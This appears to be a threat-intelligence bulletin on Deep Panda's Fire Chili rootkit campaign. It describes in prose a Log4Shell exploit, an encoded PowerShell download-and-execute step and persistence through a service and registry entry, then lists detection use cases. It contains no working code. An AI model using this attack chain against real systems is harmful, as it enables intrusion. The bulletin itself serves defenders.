April 05, 2022

Deep Panda & Fire Chili Rootkits

Industry: Academic, Cosmetic, Financial, Travel | Level: Tactical | Source: Fortinet

Chinese APT group, Deep Panda has been identified by researchers at FortiGuard Labs to be exploiting the Log4Shell vulnerability utilizing a new digitally signed rootkit dubbed Fire Chili. The certificates are stolen from game development companies Frostburn Studios and Korean 433CCR Company. The attack chain begins with a Log4Shell exploit on a vulnerable VMWare Horizon server that spawns an encoded PowerShell command to download and execute scripts, completing with a malicious DLL file being installed. Persistence is achieved by creating a service and registry entry. The Fire Chili rootkit has currently been scoring low based on VirusTotal review.

  • Anvilogic Scenario: Deep Panda – Fire Chili Threat Campaign – Initial Attack Stage
  • Anvilogic Use Cases:
    • Potential CVE-2021-44228 – Log4Shell
    • Encoded Powershell Command
    • Executable File Written to Disk
    • Download exe|msi|bat Proxy
    • Executable Create Script Process
    • Rare remote thread
    • Windows Service Created
    • Suspicious Registry Key Created